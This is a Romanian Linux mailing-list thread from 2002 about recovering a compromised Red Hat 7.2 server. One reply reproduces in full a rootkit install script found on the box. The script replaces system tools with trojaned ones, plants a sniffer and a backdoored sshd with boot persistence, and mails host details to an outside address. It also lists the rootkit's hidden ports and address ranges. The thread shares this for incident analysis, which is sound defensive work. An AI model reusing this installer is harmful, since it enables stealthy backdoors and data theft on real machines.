Hello paul, Un lucru tot e bun. Ca mi-ai zis adresa de mail. Care mai are rootkituri sariti cu emailurile unde se duc info despre server. Asha mai scapam de ei oleak:)
Gushterul P.S. Hapropo ce-ar fi o pagina de web cu toti? Nu sa punem rk acolo ci info sha shthie homu' lha khare sha hai dhea in khap. Reformulez cine face hosting? :) Friday, May 24, 2002, 11:38:02 PM, you wrote: pzeur> Reinstall tot dupa care te inregistrezi cu rhn_register la rh network si pzeur> dupa ce ai inscris sitemul tau la ei poti folosi "up2date -u" pentru pzeur> update-uri la zi. Seamana a wingoz dar merge bine. pzeur> Daca ai probleme cu conexiunea il lasi sa aduca headerele, pe care le pzeur> pune in /var/spool/up2date, (ai de downloadat vreo 200 mb de updateuri) pzeur> cauta un mirror apropiat la updates.redhat.com (ex: ftp.ubbcluj.ro) aduci pzeur> de acolo pachetele corespunzatoare headerelor pe care le pui in pzeur> /var/spool/up2date si repornesti "up2date -u". pzeur> si mie mi-a gaurit wu-ftpd-u din rh7.2 dar rootkitu era pentru alt sistem pzeur> asa ca l-am gasit dupa vreo 3 ore (asteptam sa se termine "up2date -u" cu pzeur> serviciile pornite de bou ce am fost:) cind ps, ls , netstat nu mergeau. pzeur> asa ca am adus repede respectivele app de pe alt sistem, si surpriza... pzeur> nfsd -q -p 50000 care era un sshd modificat. m-am uitat prin directoare pzeur> si am gasit in /var/ftp/ un director care nu era acolo ultima data cind m-am pzeur> uitat. Cautind prin fisierele din el dau de o cale la ceva director de pzeur> librarii unde era cam asa ceva: pzeur> . pzeur> .. pzeur> .lib pzeur> .tooz pzeur> in .tooz era fisierul install: pzeur> #private version from cur / not hacked by lamme assz as Em|nem or others! pzeur> #phear my reverge all u mother fuckers pzeur> # rk made ONLY 4 my friends ond ONLY 4 fun pzeur> #!/bin/sh pzeur> unset HISTFILE pzeur> chattr -iau /usr/src/linux/arch/alpha/lib/.lib/ pzeur> chattr -iau /bin/ps pzeur> chattr -iau /bin/ls pzeur> chattr -iau /bin/netstat pzeur> chattr -iau /bin/lpd pzeur> rm -rf /etc/ssh* pzeur> clear pzeur> mkdir -p /usr/src/linux/arch/alpha/lib/.lib sh sysinfo1 >> new-host pzeur> sh ssh_random_key pzeur> mv .1proc /usr/src/linux/arch/alpha/lib/.lib/ pzeur> mv .1addr /usr/src/linux/arch/alpha/lib/.lib/ pzeur> mv .1file /usr/src/linux/arch/alpha/lib/.lib/ pzeur> mv /bin/ps /usr/src/linux/arch/alpha/lib/.lib/.ps pzeur> mv /bin/ls /usr/src/linux/arch/alpha/lib/.lib/.ls pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1proc pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1addr pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1file pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ps pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ls pzeur> mv ps /bin/ps pzeur> mv ls /bin/ls pzeur> mv /bin/netstat /usr/src/linux/arch/alpha/lib/.lib/ pzeur> mv netstat /bin/netstat pzeur> chown root.root /bin/ls pzeur> chown root.root /bin/ps pzeur> chown root.root /bin/netstat pzeur> mv linsniffer /bin/lpd pzeur> rm -rf /etc/ssh* pzeur> rm -rf /usr/man/man8/rpc.rstatd.8 pzeur> rm -rf /usr/sbin/rpc.rstatd pzeur> rm -rf /usr/sbin/rpc* pzeur> lpd & pzeur> ./lpd pzeur> mv sshd /bin/nfsd pzeur> mv -f sshd_config /etc/ pzeur> mv -f ssh_host_key /etc/ pzeur> mv -f ssh_random_seed /etc/ pzeur> mv -f ssh_host_key.pub /etc/ pzeur> rm -rf ssh_random_key pzeur> chattr +iau /bin/nfsd pzeur> chattr +iau /etc/sshd_config pzeur> chattr +iau /etc/ssh_host_key pzeur> chattr +iau /etc/ssh_random_seed pzeur> chattr +iau /etc/ssh_host_key.pub pzeur> nfsd -q -p 50000 pzeur> echo "nfsd -q -p 50000" >>/etc/rc.d/rc.sysinit pzeur> echo "nfsd -q -p 50000" >>/etc/rc.d/init.d/inet ./sysinfo1 >> new-host |mail -s "root6666" [EMAIL PROTECTED] pzeur> cat new-host |mail -s pzeur> #-----done with ssh---- pzeur> killall -9 portmap pzeur> killall rpc.statd pzeur> rm -f /usr/sbin/rpc.statd echo "ftp">>>/etc/ftpusers echo "root">>>/etc/ftpusers pzeur> cat /proc/cpuinfo pzeur> mv pwd /dev/capi20.20 pzeur> rm -f sysinfo1 pzeur> rm -f sysinfo pzeur> rm -f new-host pzeur> rm -f sshd pzeur> cd .. pzeur> rm -rf s.tgz pzeur> clear pzeur> echo "****************************7.1***************************" pzeur> echo "Oki" pzeur> echo "***********************SpUrKaTu&TrUnKS********************" pzeur> mai era un fisier .1addr: pzeur> 2 194.105 pzeur> 3 6666 pzeur> 3 6667 pzeur> 3 54789 pzeur> 3 31337 pzeur> 3 6668 pzeur> 3 6669 pzeur> 3 6666 pzeur> 2 194.102.233 pzeur> 2 209.142.209.161 pzeur> 2 217.10 pzeur> 2 213.233 pzeur> am pastrat fisierele ca poate nu se stie niciodata, mai sunt printre ele : pzeur> hideps install lpd sense string tcp.log utils wipe pzeur> .1addr .1file .1proc .ls netstat .ps pzeur> cam asta ma mai gasit pzeur> in general e bine ai copii originale dupa ls, ps, netstat pzeur> bafta pzeur> On Fri, 24 May 2002, Gabriel Stoicea wrote: >> Rulez un sistem RH 7.2 pe care am depistat o intruziune. >> Mi-am dat seama de asta pentru ca nu mergeau corect anumite comenzi. >> 1. Am reparat pachetele compromise (net-tools, fileutils si procps) cu >> rpm -U --force ... >> 2. Am download-at chkrootkit si chkproc imi spune ca ruleaza 2 procese >> ascunse: >> - You have 1 process hidden for readdir command >> - You have 1 process hidden for ps command >> 3. chkrootkit "intepeneste" la verificare la pozitia >> Checking 'aliens'... >> 4. Cand rebootez PC-ul imi da niste erori la demontarea partitiei /usr >> --> Illegal seek >> 5. Cand bootez imi apar cateva mesaje cum ca un program este shareware >> si nu stiu ce... si ca asculta pe portul 7000 >> 6. In boot.log apare linia >> ... Starting backdoor daemon... Done, pid=... >> Acum va intreb: >> - mai pot fi si alte pachete compromise in afara de cele numite? >> - ce este cu acele procese ascunse si cum scap de ele? >> - de ce intepeneste chkrootkit? >> - daca este intr-adevar vorba de backdoor, cum scap de el? >> >> Cu speranta ca nu va "sictiresc" cu un mail asa de lung, va multumesc >> anticipat pentru ajutor. >> Gaby >> >> >> --- >> Pentru dezabonare, trimiteti mail la >> [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. >> REGULI, arhive si alte informatii: http://www.lug.ro/mlist/ >> >> pzeur> --- pzeur> Pentru dezabonare, trimiteti mail la pzeur> [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. pzeur> REGULI, arhive si alte informatii: http://www.lug.ro/mlist/ -- Best regards, Gushterul mailto:[EMAIL PROTECTED] --- Pentru dezabonare, trimiteti mail la [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. REGULI, arhive si alte informatii: http://www.lug.ro/mlist/
